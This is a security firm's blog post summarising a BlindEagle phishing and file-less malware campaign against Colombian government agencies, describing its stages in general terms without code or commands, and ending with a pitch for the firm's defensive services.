25-12-22, 6:48 p.m.

BlindEagle threat actors used multi-stage, file-less attacks with phishing emails, PowerShell scripts, and obfuscated malware to target government systems. The campaign highlights the growing complexity of cyberattacks and the need for proactive, layered security defenses.

A South American threat group known as BlindEagle has launched a highly sophisticated cyber campaign targeting Colombian government agencies, signaling a notable escalation in both technical capability and operational maturity. The attacks, first observed in early September 2025, demonstrate how modern threat actors are blending social engineering with advanced, file-less malware techniques to evade traditional security controls.

A Trusted Email Becomes the Entry Point

The campaign began with carefully crafted phishing emails impersonating Colombia’s judicial system. Using formal legal language and official formatting, the messages claimed to be labor lawsuit notifications, pressuring recipients to act quickly. What made the attack particularly effective was that the phishing emails were sent from compromised internal accounts within the same organization, allowing them to bypass many standard email security filters that focus on external threats.

By exploiting internal trust relationships, BlindEagle significantly increased the likelihood of user interaction while reducing early detection.

A Multi-Stage, File-Less Attack Chain

Security researchers at Zscaler identified a complex, multi-stage infection chain designed to avoid disk-based detection entirely. The initial attachment was an SVG image containing encoded HTML, which redirected victims to a fraudulent web portal mimicking Colombia’s judicial branch.

From there, the attack unfolded through several stages involving JavaScript files and a PowerShell command. Each stage progressively deobfuscated the next using techniques such as Base64 encoding and custom algorithms. This layered approach made analysis difficult and delayed detection.

Steganography and Legitimate Services Used for Payload Delivery

One of the most advanced aspects of the campaign was its use of steganography and legitimate online services. The PowerShell command downloaded an image file hosted on the Internet Archive and extracted a hidden, Base64-encoded payload embedded within the image. The malicious code was then loaded directly into memory using .NET reflection, leaving no files on disk. This file-less execution method significantly reduces the effectiveness of traditional antivirus tools that rely on file scanning.

Advanced Malware and Persistent Access

The PowerShell script executed a downloader malware known as Caminho, which then retrieved DCRAT through Discord’s infrastructure. DCRAT includes advanced evasion techniques, including disabling Microsoft’s Antimalware Scan Interface, or AMSI, to prevent script inspection. Once deployed, the malware established persistence through scheduled tasks and registry modifications, enabling long-term access to compromised systems.

What This Means for Organizations

This campaign highlights a growing shift in cyber threats. Attackers are no longer relying solely on basic malware or obvious phishing attempts. Instead, they are using trusted services, in-memory execution, and internal account compromise to bypass security layers entirely. These techniques are not limited to government agencies and can be adapted easily for attacks against private organizations.

How Upside Business Technologies Can Help

Upside Business Technologies helps organizations defend against advanced threats like BlindEagle by focusing on layered, real-world security controls. We help secure email environments against internal account abuse, monitor PowerShell and script activity for suspicious behavior, and strengthen endpoint defenses against file-less malware. Our approach emphasizes proactive detection, rapid response, and practical hardening of systems that attackers commonly target.

As threat actors continue to evolve, organizations need security strategies that go beyond traditional tools. Understanding how modern attacks work is the first step. Having the right cybersecurity partner in place is what turns that understanding into real protection.